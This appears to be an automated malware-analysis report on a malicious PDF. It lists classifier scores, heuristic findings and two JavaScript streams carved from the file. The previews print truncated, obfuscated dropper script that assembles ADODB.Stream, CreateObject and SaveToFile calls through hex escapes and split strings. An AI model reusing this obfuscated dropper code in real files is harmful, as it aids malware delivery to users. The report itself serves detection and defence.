MALICIOUS
148
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
/S /JavaScript /JS (b'\n var aMi = \'if (WScript.Path[\\x22cha\\x72At\\x22](\\x57Script.\\x50ath.\\x6cength-1) \\x21=\\x20"2") WSc\\x72ipt.\\x51\\x75it(0);\\nvar DKq3 = "e" \\x2b "";\\r\\n\\x76ar \\x58Mf = "c\\x6cos" + "";\\r\\nv\\x61r\\x20CBd7 = \\x22Fi\\x6ce" + "";\\x0d\\nvar Zd9 = \\x22\\x54o" + "";\\r\\x0av\\x61r \\x45Cz = \\x22Sa\\x76e" + "\\x22;\\r\\n\\x76ar BI\\x755 = "xt" + "";\\r\\x0avar XPj\\x34 = "T\\x65" + "";\\r\\x0avar VRr0 = \\x22write" + \\x22";\\r\\nvar Oc = "en" + "";\\r\\nvar By2 = "op" + … >> -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LUREPDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0004_000.js |
pdf-javascript-stream | PDF /JS object 4 at offset 0x13D | 978 bytes |
SHA-256: d068b9a29deb00d8f09329f69885eca558d32325bd031bff1d26278a7d238eef |
|||
Preview scriptFirst 1,000 lines of the extracted script
b'
var aMi = 'if (WScript.Path[\x22cha\x72At\x22](\x57Script.\x50ath.\x6cength-1) \x21=\x20"2") WSc\x72ipt.\x51\x75it(0);\nvar DKq3 = "e" \x2b "";\r\n\x76ar \x58Mf = "c\x6cos" + "";\r\nv\x61r\x20CBd7 = \x22Fi\x6ce" + "";\x0d\nvar Zd9 = \x22\x54o" + "";\r\x0av\x61r \x45Cz = \x22Sa\x76e" + "\x22;\r\n\x76ar BI\x755 = "xt" + "";\r\x0avar XPj\x34 = "T\x65" + "";\r\x0avar VRr0 = \x22write" + \x22";\r\nvar Oc = "en" + "";\r\nvar By2 = "op" + "\x22\x3b\r\nvar MSc = "et" + "";\r\nvar TJu5 =\x20"Ch\x61rs" + "\x22;\r\nvar Dz1 = "type" + "";\r\nvar LOe8 = "\x6d"\x20+ "";\x0d\x0avar M\x4bc = "rea" + \x22";\r\nv\x61r ZJf1 = "DB.St" + "";\r\nvar BOt6 = "O" + "";\r\nvar F\x47g0 \x3d \x22\x44" +\x20"";\r\nvar Hr = "A\x22 + "\x22;\r\nva\x72 KC\x67\x20= \x22ject" \x2b "";\r\nva\x72 \x58O\x66 = \x22Ob"\x20+ "";\r\nvar NFm = "eate\x22 + "\x22\x3b\r\nvar Bv = "Cr\x22 +\x20""\x3b\r\nvar FO\x626 =\x20"join" + "";\r\nfuncti\x6fn WQh(J\x6d){return Jm;};\x66unc\x74\x69o\x6e VWu1\x28SPi8
|
|||
javascript_obj0004_001.js |
pdf-javascript-stream | PDF /JS object 4 at offset 0x13D | 84 bytes |
SHA-256: 2eb5c7887157dd433f0679e46c1190cc3ecb029080b6ba04fe32529eb68f9b5b |
|||
Preview scriptFirst 1,000 lines of the extracted script
b'
var aMi = 'if (WScript.Path[\x22cha\x72At\x22](\x57Script.\x50ath.\x6cength-1
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.